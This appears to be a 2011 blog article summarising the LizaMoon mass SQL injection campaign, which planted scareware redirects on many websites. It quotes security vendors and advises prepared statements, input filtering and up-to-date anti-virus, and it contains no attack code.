LizaMoon Outbreak

LizaMoon is the name of a recent attack, on numerous websites, that has been ongoing since September 2010. This 2 part SQL injection attack was named after one of the original domains hosting the attack code. In the first part an injection attack infects the web server, and arms the website with a malware payload. The second half of the attack hits the end user, who upon visiting the web site, is hit with a trojan containing scareware, or fake anti-virus software. The attacks were originally detected by security software vendor WebSense. The LizaMoon attack, which at first was grossly over estimated, is reported to have hit epidemic proportions, with up to 380,000 legitimate websites reported by Google as infected as of March 31, 2011. This number seems to be increasing, even though efforts have been made to block the domain and remove the malware.

According to Trend Micro’s TrendLabs Malware Blog, “The LizaMoon attack is an SQL-Injection attack, targeting a vast amount of unrelated websites, including several catalog pages on Apple’s ITunes. The attack inserts a line of code referencing a PHP script which redirects legitimate websites to other malware sites, including the FAKEAV and WORID malware. Further analysis by TrendMicro researchers reveals that ASPX and ASP web app sites are being exploited by a GET request containing parameters with SQL statements and the encoded script tag and URL shown below:


Retrieved samples from active instances are now detected as TROJ_FAKEAV.BBK and TROJ_WORID.A.”
http://blog.trendmicro.com/lizamoon-etc-sql-injection-attack-still-on-going/)

A recently released FAQ from Websense--the security firm credited with the initial discovery of LizaMoon, explains: "Everything points to that this is a vulnerability in a web application. We don't know which one(s) yet but SQL Injection attacks work by issuing SQL commands in un-sanitized input to the server. That doesn't mean it's a vulnerability in the SQL Server itself, it means that the Web application isn't filtering input from the user correctly." (http://www.pcworld.com/businesscenter/article/224125/lizamoon_attack_what_you_need_to_know.html)

With all of the data, its easy to see this was not a super advance, and dangerous worm. No, this attack was designed to infect thousands of hosts, and serve even more malware to huge user bases. This attack is advanced in the sense of how many protocols it travels through, before striking the end user, but even then the end user must be unaware and fall victim a cheap fishing trick. But in an awareness sense, no, I do not think this hack is advanced, in fact, I think there are many preventative measures we can take against the Lizamoon outbreak.

The SANS Internet Storm Center, a security monitoring firm, states that “Defense against your sites getting infected is the standard things we ought to be doing anyway in regards to SQL injection (i.e.use prepared statements, filter input for control characters, whitelist if possible, blacklist if not). Webserver administrators should also be checking for sudden appearance of files in their httpdocs directory.” (http://isc.sans.edu/diary/LizaMoon+Mass+SQLInjection+Attack+Infected+at+least+500k+Websites/10642)

End users are advised to keep their anti-virus and anti-malware software updated. Although many of the websites effected are low traffic sites, the sheer number of infected sites continues to poison end users. The end user, who after running the aforementioned PHP code is led to a scareware prompt, advertising false anti- virus software. This scareware, then forces downloads of further trojans onto the infected machines. Although some high profile sites such as ITunes were reported as being infected, many sites with proper security precautions in place did not suffer the exploit and should offer no risk to end users. The community is now alert and anti-virus signatures have been released but increased vigilance is still required on the part of users at this time.